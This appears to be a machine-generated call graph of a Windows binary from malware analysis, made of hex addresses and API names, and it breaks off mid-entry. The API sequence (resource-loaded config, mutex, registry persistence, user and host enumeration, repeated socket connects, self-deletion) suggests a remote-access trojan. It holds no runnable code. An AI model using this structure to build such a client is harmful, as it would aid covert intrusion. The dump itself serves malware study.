401e65 22 API calls 46701->46702 46703 40eaa2 46702->46703 47359 410f72 36 API calls __EH_prolog 46703->47359 46705 40eafd 46704->46705 47106 40531e 46705->47106 46708 40eb0c 47111 406383 46708->47111 46709 40eab4 47360 40fb9f 78 API calls 46709->47360 46712 40eabd 47361 40f3eb 71 API calls 46712->47361 46719 401fd8 11 API calls 46721 40ef36 46719->46721 46720 401fd8 11 API calls 46722 40eb36 46720->46722 46963 443396 GetModuleHandleW 46721->46963 46723 401e65 22 API calls 46722->46723 46724 40eb3f 46723->46724 47128 401fc0 46724->47128 46726 40eb4a 46727 401e65 22 API calls 46726->46727 46728 40eb63 46727->46728 46729 401e65 22 API calls 46728->46729 46730 40eb7e 46729->46730 46731 40ebe9 46730->46731 47362 406c59 46730->47362 46733 401e65 22 API calls 46731->46733 46737 40ebf6 46733->46737 46734 40ebab 46735 401fe2 28 API calls 46734->46735 46736 40ebb7 46735->46736 46739 401fd8 11 API calls 46736->46739 46738 40ec3d 46737->46738 46744 413584 3 API calls 46737->46744 47132 40d0a4 46738->47132 46740 40ebc0 46739->46740 47367 413584 RegOpenKeyExA 46740->47367 46742 40ec43 46743 40eac6 46742->46743 47135 41b354 46742->47135 46743->46719 46750 40ec21 46744->46750 46748 40ec5e 46751 40ecb1 46748->46751 47152 407751 46748->47152 46749 40f38a 47450 4139e4 30 API calls 46749->47450 46750->46738 47370 4139e4 30 API calls 46750->47370 46754 401e65 22 API calls 46751->46754 46757 40ecba 46754->46757 46756 40f3a0 47451 4124b0 65 API calls ___scrt_fastfail 46756->47451 46765 40ecc6 46757->46765 46766 40eccb 46757->46766 46760 40ec87 46762 401e65 22 API calls 46760->46762 46761 40ec7d 47371 407773 30 API calls 46761->47371 46775 40ec90 46762->46775 46763 40f3aa 46768 41bcef 28 API calls 46763->46768 47374 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46765->47374 46771 401e65 22 API calls 46766->46771 46767 40ec82 47372 40729b 98 API calls 46767->47372 46772 40f3ba 46768->46772 46773 40ecd4 46771->46773 47261 413a5e RegOpenKeyExW 46772->47261 47156 41bcef 46773->47156 46775->46751 46779 40ecac 46775->46779 46776 40ecdf 47160 401f13 46776->47160 47373 40729b 98 API calls 46779->47373 46783 401f09 11 API calls 46785 40f3d7 46783->46785 46787 401f09 11 API calls 46785->46787 46789 40f3e0 46787->46789 46788 401e65 22 API calls 46790 40ecfc 46788->46790 47264 40dd7d 46789->47264 46795 401e65 22 API calls 46790->46795 46794 40f3ea 46796 40ed16 46795->46796 46797 401e65 22 API calls 46796->46797 46798 40ed30 46797->46798 46799 401e65 22 API calls 46798->46799 46800 40ed49 46799->46800 46801 40edb6 46800->46801 46803 401e65 22 API calls 46800->46803 46802 40edc5 46801->46802 46809 40ef41 ___scrt_fastfail 46801->46809 46804 40edce 46802->46804 46832 40ee4a ___scrt_fastfail 46802->46832 46807 40ed5e _wcslen 46803->46807 46805 401e65 22 API calls 46804->46805 46806 40edd7 46805->46806 46808 401e65 22 API calls 46806->46808 46807->46801 46810 401e65 22 API calls 46807->46810 46811 40ede9 46808->46811 47435 413733 RegOpenKeyExA 46809->47435 46812 40ed79 46810->46812 46814 401e65 22 API calls 46811->46814 46815 401e65 22 API calls 46812->46815 46816 40edfb 46814->46816 46817 40ed8e 46815->46817 46819 401e65 22 API calls 46816->46819 47375 40da6f 46817->47375 46818 40ef8c 46820 401e65 22 API calls 46818->46820 46821 40ee24 46819->46821 46822 40efb1 46820->46822 46826 401e65 22 API calls 46821->46826 47182 402093 46822->47182 46825 401f13 28 API calls 46828 40edad 46825->46828 46829 40ee35 46826->46829 46831 401f09 11 API calls 46828->46831 47433 40ce34 45 API calls _wcslen 46829->47433 46830 40efc3 47188 4137aa RegCreateKeyA 46830->47188 46831->46801 47172 413982 46832->47172 46836 40eede ctype 46841 401e65 22 API calls 46836->46841 46837 40ee45 46837->46832 46839 401e65 22 API calls 46840 40efe5 46839->46840 47194 43bb2c 46840->47194 46842 40eef5 46841->46842 46842->46818 46846 40ef09 46842->46846 46845 40effc 47438 41ce2c 87 API calls ___scrt_fastfail 46845->47438 46848 401e65 22 API calls 46846->46848 46847 40f01f 46852 402093 28 API calls 46847->46852 46850 40ef12 46848->46850 46853 41bcef 28 API calls 46850->46853 46851 40f003 CreateThread 46851->46847 48318 41d4ee 10 API calls 46851->48318 46854 40f034 46852->46854 46855 40ef1e 46853->46855 46856 402093 28 API calls 46854->46856 47434 40f4af 104 API calls 46855->47434 46859 40f043 46856->46859 46858 40ef23 46858->46818 46861 40ef2a 46858->46861 47198 41b580 46859->47198 46861->46743 46863 401e65 22 API calls 46864 40f054 46863->46864 46865 401e65 22 API calls 46864->46865 46866 40f066 46865->46866 46867 401e65 22 API calls 46866->46867 46868 40f086 46867->46868 46869 43bb2c 40 API calls 46868->46869 46870 40f093 46869->46870 46871 401e65 22 API calls 46870->46871 46872 40f09e 46871->46872 46873 401e65 22 API calls 46872->46873 46874 40f0af 46873->46874 46875 401e65 22 API calls 46874->46875 46876 40f0c4 46875->46876 46877 401e65 22 API calls 46876->46877 46878 40f0d5 46877->46878 46879 40f0dc StrToIntA 46878->46879 47222 409e1f 46879->47222 46882 401e65 22 API calls 46883 40f0f7 46882->46883 46884 40f103 46883->46884 46885 40f13c 46883->46885 47439 43455e 46884->47439 46888 401e65 22 API calls 46885->46888 46889 40f14c 46888->46889 46892 40f194 46889->46892 46893 40f158 46889->46893 46890 401e65 22 API calls 46891 40f11f 46890->46891 46894 40f126 CreateThread 46891->46894 46896 401e65 22 API calls 46892->46896 46895 43455e new 22 API calls 46893->46895 46894->46885 48322 41a045 103 API calls __EH_prolog 46894->48322 46897 40f161 46895->46897 46898 40f19d 46896->46898 46899 401e65 22 API calls 46897->46899 46901 40f207 46898->46901 46902 40f1a9 46898->46902 46900 40f173 46899->46900 46904 40f17a CreateThread 46900->46904 46905 401e65 22 API calls 46901->46905 46903 401e65 22 API calls 46902->46903 46907 40f1b9 46903->46907 46904->46892 48321 41a045 103 API calls __EH_prolog 46904->48321 46906 40f210 46905->46906 46908 40f255 46906->46908 46909 40f21c 46906->46909 46910 401e65 22 API calls 46907->46910 47247 41b69e GetComputerNameExW GetUserNameW 46908->47247 46912 401e65 22 API calls 46909->46912 46913 40f1ce 46910->46913 46915 40f225 46912->46915 47446 40da23 31 API calls 46913->47446 46920 401e65 22 API calls 46915->46920 46916 401f13 28 API calls 46917 40f269 46916->46917 46919 401f09 11 API calls 46917->46919 46922 40f272 46919->46922 46923 40f23a 46920->46923 46921 40f1e1 46924 401f13 28 API calls 46921->46924 46925 40f27b SetProcessDEPPolicy 46922->46925 46926 40f27e CreateThread 46922->46926 46933 43bb2c 40 API calls 46923->46933 46927 40f1ed 46924->46927 46925->46926 46928 40f293 CreateThread 46926->46928 46929 40f29f 46926->46929 48290 40f7e2 46926->48290 46930 401f09 11 API calls 46927->46930 46928->46929 48317 412132 138 API calls 46928->48317 46931 40f2b4 46929->46931 46932 40f2a8 CreateThread 46929->46932 46934 40f1f6 CreateThread 46930->46934 46936 40f307 46931->46936 46938 402093 28 API calls 46931->46938 46932->46931 48319 412716 38 API calls ___scrt_fastfail 46932->48319 46935 40f247 46933->46935 46934->46901 48320 401a6d 50 API calls 46934->48320 47447 40c19d 7 API calls 46935->47447 47258 41353a RegOpenKeyExA 46936->47258 46939 40f2d7 46938->46939 47448 4052fd 28 API calls 46939->47448 46945 40f328 46947 41bcef 28 API calls 46945->46947 46948 40f338 46947->46948 47449 413656 31 API calls 46948->47449 46953 40f34e 46954 401f09 11 API calls 46953->46954 46957 40f359 46954->46957 46955 40f381 DeleteFileW 46956 40f388 46955->46956 46955->46957 46956->46763 46957->46763 46957->46955 46958 40f36f Sleep 46957->46958 46958->46957 46959->46637 46960->46641 46961->46648 46962->46644 46963->46654 46964->46655 46965->46657 46966->46660 46967->46664 46968->46666 46973 44fbe8 46969->46973 46972 438fda 8 API calls 3 library calls 46972->46671 46976 44fc05 46973->46976 46977 44fc01 46973->46977 46975 43464e 46975->46669 46975->46972 46976->46977 46979 449d26 46976->46979 46991 43502b 46977->46991 46980 449d32 CallCatchBlock 46979->46980 46998 445909 EnterCriticalSection 46980->46998 46982 449d39 46999 450203 46982->46999 46984 449d48 46990 449d57 46984->46990 47010 449bba 23 API calls 46984->47010 46987 449d52 47011 449c70 GetStdHandle GetFileType 46987->47011 46988 449d68 CallCatchBlock 46988->46976 47012 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 46990->47012 46992 435036 IsProcessorFeaturePresent 46991->46992 46993 435034 46991->46993 46995 435078 46992->46995 46993->46975 47034 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46995->47034 46997 43515b 46997->46975 46998->46982 47000 45020f CallCatchBlock 46999->47000 47001 450233 47000->47001 47002 45021c 47000->47002 47013 445909 EnterCriticalSection 47001->47013 47021 44062d 20 API calls _Atexit 47002->47021 47006 45023f 47009 45026b 47006->47009 47014 450154 47006->47014 47007 450221 __cftoe CallCatchBlock 47007->46984 47022 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47009->47022 47010->46987 47011->46990 47012->46988 47013->47006 47023 445b74 47014->47023 47016 450166 47020 450173 47016->47020 47030 448b04 11 API calls 2 library calls 47016->47030 47019 4501c5 47019->47006 47031 446802 20 API calls __dosmaperr 47020->47031 47021->47007 47022->47007 47029 445b81 __Getctype 47023->47029 47024 445bc1 47033 44062d 20 API calls _Atexit 47024->47033 47025 445bac RtlAllocateHeap 47026 445bbf 47025->47026 47025->47029 47026->47016 47029->47024 47029->47025 47032 443001 7 API calls 2 library calls 47029->47032 47030->47016 47031->47019 47032->47029 47033->47026 47034->46997 47036 434bb8 GetStartupInfoW 47035->47036 47036->46675 47038 44f0eb 47037->47038 47039 44f0e2 47037->47039 47038->46680 47042 44efd8 49 API calls 5 library calls 47039->47042 47041->46680 47042->47038 47044 41cc20 LoadLibraryA GetProcAddress 47043->47044 47045 41cc10 GetModuleHandleA GetProcAddress 47043->47045 47046 41cc49 44 API calls 47044->47046 47047 41cc39 LoadLibraryA GetProcAddress 47044->47047 47045->47044 47046->46683 47047->47046 47452 41b539 FindResourceA 47048->47452 47052 40f428 ctype 47462 4020b7 47052->47462 47055 401fe2 28 API calls 47056 40f44e 47055->47056 47057 401fd8 11 API calls 47056->47057 47058 40f457 47057->47058 47059 43bda0 new 21 API calls 47058->47059 47060 40f468 ctype 47059->47060 47468 406e13 47060->47468 47062 40f49b 47062->46685 47064 40210c 47063->47064 47065 4023ce 11 API calls 47064->47065 47066 402126 47065->47066 47067 402569 28 API calls 47066->47067 47068 402134 47067->47068 47068->46688 47522 4020df 47069->47522 47071 41bf2f 47072 401fd8 11 API calls 47071->47072 47073 41bf61 47072->47073 47074 401fd8 11 API calls 47073->47074 47076 41bf69 47074->47076 47075 41bf31 47538 4041a2 28 API calls 47075->47538 47079 401fd8 11 API calls 47076->47079 47081 40ea5f 47079->47081 47080 41bf3d 47082 401fe2 28 API calls 47080->47082 47091 40fb52 47081->47091 47084 41bf46 47082->47084 47083 401fe2 28 API calls 47090 41bebf 47083->47090 47085 401fd8 11 API calls 47084->47085 47087 41bf4e 47085->47087 47086 401fd8 11 API calls 47086->47090 47089 41cec5 28 API calls 47087->47089 47089->47071 47090->47071 47090->47075 47090->47083 47090->47086 47526 4041a2 28 API calls 47090->47526 47527 41cec5 47090->47527 47092 40fb5e 47091->47092 47094 40fb65 47091->47094 47564 402163 11 API calls 47092->47564 47094->46693 47096 402163 47095->47096 47100 40219f 47096->47100 47565 402730 11 API calls 47096->47565 47098 402184 47566 402712 11 API calls std::_Deallocate 47098->47566 47100->46695 47102 401e6d 47101->47102 47104 401e75 47102->47104 47567 402158 22 API calls 47102->47567 47104->46700 47107 4020df 11 API calls 47106->47107 47108 40532a 47107->47108 47568 4032a0 47108->47568 47110 405346 47110->46708 47572 4051ef 47111->47572 47113 406391 47576 402055 47113->47576 47116 401fe2 47117 401ff1 47116->47117 47124 402039 47116->47124 47118 4023ce 11 API calls 47117->47118 47119 401ffa 47118->47119 47120 402015 47119->47120 47121 40203c 47119->47121 47608 403098 28 API calls 47120->47608 47122 40267a 11 API calls 47121->47122 47122->47124 47125 401fd8 47124->47125 47126 4023ce 11 API calls 47125->47126 47127 401fe1 47126->47127 47127->46720 47129 401fd2 47128->47129 47130 401fc9 47128->47130 47129->46726 47609 4025e0 28 API calls 47130->47609 47610 401fab 47132->47610 47134 40d0ae CreateMutexA GetLastError 47134->46742 47611 41c048 47135->47611 47140 401fe2 28 API calls 47141 41b390 47140->47141 47142 401fd8 11 API calls 47141->47142 47143 41b398 47142->47143 47144 4135e1 31 API calls 47143->47144 47146 41b3ee 47143->47146 47145 41b3c1 47144->47145 47147 41b3cc StrToIntA 47145->47147 47146->46748 47148 41b3e3 47147->47148 47149 41b3da 47147->47149 47151 401fd8 11 API calls 47148->47151 47619 41cffa 22 API calls 47149->47619 47151->47146 47153 407765 47152->47153 47154 413584 3 API calls 47153->47154 47155 40776c 47154->47155 47155->46760 47155->46761 47157 41bd03 47156->47157 47620 40b93f 47157->47620 47159 41bd0b 47159->46776 47161 401f22 47160->47161 47168 401f6a 47160->47168 47162 402252 11 API calls 47161->47162 47163 401f2b 47162->47163 47164 401f6d 47163->47164 47165 401f46 47163->47165 47653 402336 47164->47653 47652 40305c 28 API calls 47165->47652 47169 401f09 47168->47169 47170 402252 11 API calls 47169->47170 47171 401f12 47170->47171 47171->46788 47173 4139a0 47172->47173 47174 406e13 28 API calls 47173->47174 47175 4139b5 47174->47175 47176 4020f6 28 API calls 47175->47176 47177 4139c5 47176->47177 47178 4137aa 14 API calls 47177->47178 47179 4139cf 47178->47179 47180 401fd8 11 API calls 47179->47180 47181 4139dc 47180->47181 47181->46836 47183 40209b 47182->47183 47184 4023ce 11 API calls 47183->47184 47185 4020a6 47184->47185 47657 4024ed 47185->47657 47189 4137fa 47188->47189 47192 4137c3 47188->47192 47190 401fd8 11 API calls 47189->47190 47191 40efd9 47190->47191 47191->46839 47193 4137d5 RegSetValueExA RegCloseKey 47192->47193 47193->47189 47195 43bb45 _swprintf 47194->47195 47661 43ae83 47195->47661 47197 40eff2 47197->46845 47197->46847 47199 41b631 47198->47199 47200 41b596 GetLocalTime 47198->47200 47202 401fd8 11 API calls 47199->47202 47201 40531e 28 API calls 47200->47201 47203 41b5d8 47201->47203 47204 41b639 47202->47204 47205 406383 28 API calls 47203->47205 47206 401fd8 11 API calls 47204->47206 47207 41b5e4 47205->47207 47208 40f048 47206->47208 47689 402f10 47207->47689 47208->46863 47211 406383 28 API calls 47212 41b5fc 47211->47212 47694 40723b 77 API calls 47212->47694 47214 41b60a 47215 401fd8 11 API calls 47214->47215 47216 41b616 47215->47216 47217 401fd8 11 API calls 47216->47217 47218 41b61f 47217->47218 47219 401fd8 11 API calls 47218->47219 47220 41b628 47219->47220 47221 401fd8 11 API calls 47220->47221 47221->47199 47223 409e3d _wcslen 47222->47223 47224 409e48 47223->47224 47225 409e5f 47223->47225 47226 40da6f 31 API calls 47224->47226 47227 40da6f 31 API calls 47225->47227 47228 409e50 47226->47228 47229 409e67 47227->47229 47230 401f13 28 API calls 47228->47230 47231 401f13 28 API calls 47229->47231 47246 409e5a 47230->47246 47232 409e75 47231->47232 47233 401f09 11 API calls 47232->47233 47234 409e7d 47233->47234 47713 409196 28 API calls 47234->47713 47235 401f09 11 API calls 47237 409eb4 47235->47237 47698 40a144 47237->47698 47238 409e8f 47714 403014 47238->47714 47243 401f13 28 API calls 47244 409ea4 47243->47244 47245 401f09 11 API calls 47244->47245 47245->47246 47246->47235 47918 40417e 47247->47918 47252 403014 28 API calls 47253 41b703 47252->47253 47254 401f09 11 API calls 47253->47254 47255 41b70c 47254->47255 47256 401f09 11 API calls 47255->47256 47257 40f25e 47256->47257 47257->46916 47259 41355b RegQueryValueExA RegCloseKey 47258->47259 47260 40f31f 47258->47260 47259->47260 47260->46789 47260->46945 47262 40f3cd 47261->47262 47263 413a7a RegDeleteValueW 47261->47263 47262->46783 47263->47262 47265 40dd96 47264->47265 47266 41353a 3 API calls 47265->47266 47267 40dd9d 47266->47267 47268 40ddbc 47267->47268 48010 401707 47267->48010 47272 414f65 47268->47272 47270 40ddaa 48013 4138b2 RegCreateKeyA 47270->48013 47273 4020df 11 API calls 47272->47273 47274 414f79 47273->47274 48027 41b944 47274->48027 47277 4020df 11 API calls 47278 414f8f 47277->47278 47279 401e65 22 API calls 47278->47279 47280 414f9d 47279->47280 47281 43bb2c 40 API calls 47280->47281 47282 414faa 47281->47282 47283 414fbc 47282->47283 47284 414faf Sleep 47282->47284 47285 402093 28 API calls 47283->47285 47284->47283 47286 414fcb 47285->47286 47287 401e65 22 API calls 47286->47287 47288 414fd4 47287->47288 47289 4020f6 28 API calls 47288->47289 47290 414fdf 47289->47290 47291 41beac 28 API calls 47290->47291 47292 414fe7 47291->47292 48031 40489e WSAStartup 47292->48031 47294 414ff1 47295 401e65 22 API calls 47294->47295 47296 414ffa 47295->47296 47297 401e65 22 API calls 47296->47297 47322 415079 47296->47322 47298 415013 47297->47298 47299 401e65 22 API calls 47298->47299 47300 415024 47299->47300 47302 401e65 22 API calls 47300->47302 47301 41beac 28 API calls 47301->47322 47303 415035 47302->47303 47305 401e65 22 API calls 47303->47305 47304 406c59 28 API calls 47304->47322 47306 415046 47305->47306 47308 401e65 22 API calls 47306->47308 47307 401fe2 28 API calls 47307->47322 47309 415057 47308->47309 47310 401e65 22 API calls 47309->47310 47311 415069 47310->47311 48196 40473d 89 API calls 47311->48196 47313 406383 28 API calls 47313->47322 47314 401e65 22 API calls 47314->47322 47316 4151c7 WSAGetLastError 48197 41cb72 30 API calls 47316->48197 47321 402093 28 API calls 47321->47322 47322->47301 47322->47304 47322->47307 47322->47313 47322->47314 47322->47316 47322->47321 47325 40531e 28 API calls 47322->47325 47326 401e8d 11 API calls 47322->47326 47327 43bb2c 40 API calls 47322->47327 47329 41b580 80 API calls 47322->47329 47332 409097 28 API calls 47322->47332 47333 441ed1 20 API calls 47322->47333 47334 4020f6 28 API calls 47322->47334 47335 413733 3 API calls 47322->47335 47336 4135e1 31 API calls 47322->47336 47337 40417e 28 API calls 47322->47337 47340 41bc1f 28 API calls 47322->47340 47341 401e65 22 API calls 47322->47341 47346 41bdaf 28 API calls 47322->47346 47349 402f10 28 API calls 47322->47349 47350 402ea1 28 API calls 47322->47350 47352 401fd8 11 API calls 47322->47352 47354 415a6e 47322->47354 47356 415aac CreateThread 47322->47356 47357 401f09 11 API calls 47322->47357 48032 414f24 47322->48032 48037 40482d 47322->48037 48044 404f51 47322->48044 48059 4048c8 connect 47322->48059 48119 41b871 47322->48119 48122 4145f8 47322->48122 48125 40ddc4 47322->48125 48131 41bcd3 47322->48131 48134 41bb77 47322->48134 48136 41bb27 47322->48136 48141 40f90c GetLocaleInfoA 47322->48141 48144 402f31 47322->48144 48149 404aa1 47322->48149 48164 404c10 47322->48164 48183 404e26 WaitForSingleObject 47322->48183 48198 4052fd 28 API calls 47322->48198 47325->47322 47326->47322 47328 415b0a Sleep 47327->47328 47328->47322 47329->47322 47332->47322 47333->47322 47334->47322 47335->47322 47336->47322 47337->47322 47340->47322 47342 415474 GetTickCount 47341->47342 47343 41bc1f 28 API calls 47342->47343 47343->47322 47346->47322 47349->47322 47350->47322 47352->47322 48199 40b08c 85 API calls 47354->48199 47356->47322 48280 41ada8 105 API calls 47356->48280 47357->47322 47358->46701 47359->46709 47360->46712 47363 4020df 11 API calls 47362->47363 47364 406c65 47363->47364 47365 4032a0 28 API calls 47364->47365 47366 406c82 47365->47366 47366->46734 47368 40ebdf 47367->47368 47369 4135ae RegQueryValueExA RegCloseKey 47367->47369 47368->46731 47368->46749 47369->47368 47370->46738 47371->46767 47372->46760 47373->46751 47374->46766 47376 401f86 11 API calls 47375->47376 47377 40da8b 47376->47377 47378 40dae0 47377->47378 47379 40daab 47377->47379 47381 40daa1 47377->47381 47382 41c048 GetCurrentProcess 47378->47382 48281 41b645 29 API calls 47379->48281 47380 40dbd4 GetLongPathNameW 47384 40417e 28 API calls 47380->47384 47381->47380 47385 40dae5 47382->47385 47387 40dbe9 47384->47387 47388 40dae9 47385->47388 47389 40db3b 47385->47389 47386 40dab4 47390 401f13 28 API calls 47386->47390 47391 40417e 28 API calls 47387->47391 47393 40417e 28 API calls 47388->47393 47392 40417e 28 API calls 47389->47392 47394 40dabe 47390->47394 47395 40dbf8 47391->47395 47396 40db49 47392->47396 47397 40daf7 47393->47397 47398 401f09 11 API calls 47394->47398 48284 40de0c 28 API calls 47395->48284 47402 40417e 28 API calls 47396->47402 47403 40417e 28 API calls 47397->47403 47398->47381 47400 40dc0b 48285 402fa5 28 API calls 47400->48285 47405 40db5f 47402->47405 47406 40db0d 47403->47406 47404 40dc16 48286 402fa5 28 API calls 47404->48286 48283 402fa5 28 API calls 47405->48283 48282 402fa5 28 API calls 47406->48282 47410 40dc20 47414 401f09 11 API calls 47410->47414 47411 40db6a 47415 401f13 28 API calls 47411->47415 47412 40db18 47413 401f13 28 API calls 47412->47413 47417 40db23 47413->47417 47418 40dc2a 47414->47418 47416 40db75 47415->47416 47419 401f09 11 API calls 47416->47419 47420 401f09 11 API calls 47417->47420 47421 401f09 11 API calls 47418->47421 47423 40db7e 47419->47423 47424 40db2c 47420->47424 47422 40dc33 47421->47422 47425 401f09 11 API calls 47422->47425 47426 401f09 11 API calls 47423->47426 47427 401f09 11 API calls 47424->47427 47428 40dc3c 47425->47428 47426->47394 47427->47394 47429 401f09 11 API calls 47428->47429 47430 40dc45 47429->47430 47431 401f09 11 API calls 47430->47431 47432 40dc4e 47431->47432 47432->46825 47433->46837 47434->46858 47436 413759 RegQueryValueExA RegCloseKey 47435->47436 47437 41377d 47435->47437 47436->47437 47437->46818 47438->46851 47443 434563 47439->47443 47440 43bda0 new 21 API calls 47440->47443 47441 40f10c 47441->46890 47443->47440 47443->47441 48287 443001 7 API calls 2 library calls 47443->48287 48288 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47443->48288 48289 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47443->48289 47446->46921 47447->46908 47449->46953 47450->46756 47453 41b556 LoadResource LockResource SizeofResource 47452->47453 47454 40f419 47452->47454 47453->47454 47455 43bda0 47454->47455 47460 4461b8 __Getctype 47455->47460 47456 4461f6 47472 44062d 20 API calls _Atexit 47456->47472 47458 4461e1 RtlAllocateHeap 47459 4461f4 47458->47459 47458->47460 47459->47052 47460->47456 47460->47458 47471 443001 7 API calls 2 library calls 47460->47471 47463 4020bf 47462->47463 47473 4023ce 47463->47473 47465 4020ca 47477 40250a 47465->47477 47467 4020d9 47467->47055 47469 4020b7 28 API calls 47468->47469 47470 406e27 47469->47470 47470->47062 47471->47460 47472->47459 47474 402428 47473->47474 47475 4023d8 47473->47475 47474->47465 47475->47474 47484 4027a7 11 API calls std::_Deallocate 47475->47484 47478 40251a 47477->47478 47479 402520 47478->47479 47480 402535 47478->47480 47485 402569 47479->47485 47495 4028e8 47480->47495 47483 402533 47483->47467 47484->47474 47506 402888 47485->47506 47487 40257d 47488 402592 47487->47488 47489 4025a7 47487->47489 47511 402a34 22 API calls 47488->47511 47490 4028e8 28 API calls 47489->47490 47494 4025a5 47490->47494 47492 40259b 47512 4029da 22 API calls 47492->47512 47494->47483 47496 4028f1 47495->47496 47497 402953 47496->47497 47498 4028fb 47496->47498 47520 4028a4 22 API calls 47497->47520 47501 402904 47498->47501 47502 402917 47498->47502 47514 402cae 47501->47514 47503 402915 47502->47503 47505 4023ce 11 API calls 47502->47505 47503->47483 47505->47503 47507 402890 47506->47507 47508 402898 47507->47508 47513 402ca3 22 API calls 47507->47513 47508->47487 47511->47492 47512->47494 47515 402cb8 __EH_prolog 47514->47515 47521 402e54 22 API calls 47515->47521 47517 402d24 47518 4023ce 11 API calls 47517->47518 47519 402d92 47518->47519 47519->47503 47521->47517 47523 4020e7 47522->47523 47524 4023ce 11 API calls 47523->47524 47525 4020f2 47524->47525 47525->47090 47526->47090 47528 41ced2 47527->47528 47529 41cf31 47528->47529 47530 41cee2 47528->47530 47531 41d071 28 API calls 47529->47531 47532 41cf4b 47529->47532 47534 41cf1a 47530->47534 47539 41d071 47530->47539 47531->47532 47548 41d1d7 28 API calls 47532->47548 47547 41d1d7 28 API calls 47534->47547 47535 41cf2d 47535->47090 47538->47080 47541 41d079 47539->47541 47540 41d0ab 47540->47534 47541->47540 47542 41d0af 47541->47542 47545 41d093 47541->47545 47559 402725 22 API calls 47542->47559 47549 41d0e2 47545->47549 47547->47535 47548->47535 47550 41d0ec __EH_prolog 47549->47550 47560 402717 22 API calls 47550->47560 47552 41d0ff 47561 41d1ee 11 API calls 47552->47561 47554 41d125 47556 41d15d 47554->47556 47562 402730 11 API calls 47554->47562 47556->47540 47557 41d144 47563 402712 11 API calls std::_Deallocate 47557->47563 47560->47552 47561->47554 47562->47557 47563->47556 47564->47094 47565->47098 47566->47100 47569 4032aa 47568->47569 47570 4028e8 28 API calls 47569->47570 47571 4032c9 47569->47571 47570->47571 47571->47110 47573 4051fb 47572->47573 47582 405274 47573->47582 47575 405208 47575->47113 47577 402061 47576->47577 47578 4023ce 11 API calls 47577->47578 47579 40207b 47578->47579 47604 40267a 47579->47604 47583 405282 47582->47583 47584 405288 47583->47584 47585 40529e 47583->47585 47593 4025f0 47584->47593 47587 4052f5 47585->47587 47588 4052b6 47585->47588 47602 4028a4 22 API calls 47587->47602 47591 4028e8 28 API calls 47588->47591 47592 40529c 47588->47592 47591->47592 47592->47575 47594 402888 22 API calls 47593->47594 47595 402602 47594->47595 47596 402672 47595->47596 47597 402629 47595->47597 47603 4028a4 22 API calls 47596->47603 47600 4028e8 28 API calls 47597->47600 47601 40263b 47597->47601 47600->47601 47601->47592 47605 40268b 47604->47605 47606 4023ce 11 API calls 47605->47606 47607 40208d 47606->47607 47607->47116 47608->47124 47609->47129 47612 41b362 47611->47612 47613 41c055 GetCurrentProcess 47611->47613 47614 4135e1 RegOpenKeyExA 47612->47614 47613->47612 47615 41360f RegQueryValueExA RegCloseKey 47614->47615 47616 413639 47614->47616 47615->47616 47617 402093 28 API calls 47616->47617 47618 41364e 47617->47618 47618->47140 47619->47148 47621 40b947 47620->47621 47626 402252 47621->47626 47623 40b952 47630 40b967 47623->47630 47625 40b961 47625->47159 47627 4022ac 47626->47627 47628 40225c 47626->47628 47627->47623 47628->47627 47637 402779 11 API calls std::_Deallocate 47628->47637 47631 40b9a1 47630->47631 47632 40b973 47630->47632 47649 4028a4 22 API calls 47631->47649 47638 4027e6 47632->47638 47636 40b97d 47636->47625 47637->47627 47639 4027ef 47638->47639 47640 402851 47639->47640 47641 4027f9 47639->47641 47651 4028a4 22 API calls 47640->47651 47644 402802 47641->47644 47646 402815 47641->47646 47650 402aea 28 API calls __EH_prolog 47644->47650 47647 402813 47646->47647 47648 402252 11 API calls 47646->47648 47647->47636 47648->47647 47650->47647 47652->47168 47654 402347 47653->47654 47655 402252 11 API calls 47654->47655 47656 4023c7 47655->47656 47656->47168 47658 4024f9 47657->47658 47659 40250a 28 API calls 47658->47659 47660 4020b1 47659->47660 47660->46830 47677 43ba8a 47661->47677 47663 43aed0 47683 43a837 36 API calls 3 library calls 47663->47683 47665 43ae95 47665->47663 47666 43aeaa 47665->47666 47668 43aeaf __cftoe 47665->47668 47682 44062d 20 API calls _Atexit 47666->47682 47668->47197 47670 43aedc 47673 43af0b 47670->47673 47684 43bacf 40 API calls __Tolower 47670->47684 47671 43af77 47686 43ba36 20 API calls 2 library calls 47671->47686 47673->47671 47685 43ba36 20 API calls 2 library calls 47673->47685 47675 43b03e _swprintf 47675->47668 47687 44062d 20 API calls _Atexit 47675->47687 47678 43baa2 47677->47678 47679 43ba8f 47677->47679 47678->47665 47688 44062d 20 API calls _Atexit 47679->47688 47681 43ba94 __cftoe 47681->47665 47682->47668 47683->47670 47684->47670 47685->47671 47686->47675 47687->47668 47688->47681 47695 401fb0 47689->47695 47691 402f1e 47692 402055 11 API calls 47691->47692 47693 402f2d 47692->47693 47693->47211 47694->47214 47696 4025f0 28 API calls 47695->47696 47697 401fbd 47696->47697 47697->47691 47699 40a162 47698->47699 47700 413584 3 API calls 47699->47700 47701 40a169 47700->47701 47702 40a197 47701->47702 47703 40a17d 47701->47703 47719 409097 47702->47719 47704 40a182 47703->47704 47705 409ed6 47703->47705 47707 409097 28 API calls 47704->47707 47705->46882 47709 40a190 47707->47709 47747 40a268 29 API calls 47709->47747 47712 40a195 47712->47705 47713->47238 47895 403222 47714->47895 47716 403022 47899 403262 47716->47899 47720 4090ad 47719->47720 47721 402252 11 API calls 47720->47721 47722 4090c7 47721->47722 47748 404267 47722->47748 47724 4090d5 47725 40a1b4 47724->47725 47760 40b927 47725->47760 47728 40a205 47731 402093 28 API calls 47728->47731 47729 40a1dd 47730 402093 28 API calls 47729->47730 47732 40a1e7 47730->47732 47733 40a210 47731->47733 47734 41bcef 28 API calls 47732->47734 47735 402093 28 API calls 47733->47735 47736 40a1f5 47734->47736 47737 40a21f 47735->47737 47764 40b19f 31 API calls new 47736->47764 47739 41b580 80 API calls 47737->47739 47740 40a224 CreateThread 47739->47740 47742 40a24b CreateThread 47740->47742 47743 40a23f CreateThread 47740->47743 47772 40a2b8 47740->47772 47741 40a1fc 47744 401fd8 11 API calls 47741->47744 47745 401f09 11 API calls 47742->47745 47769 40a2c4 47742->47769 47743->47742 47766 40a2a2 47743->47766 47744->47728 47746 40a25f 47745->47746 47746->47705 47747->47712 47894 40a2ae 163 API calls 47747->47894 47749 402888 22 API calls 47748->47749 47750 40427b 47749->47750 47751 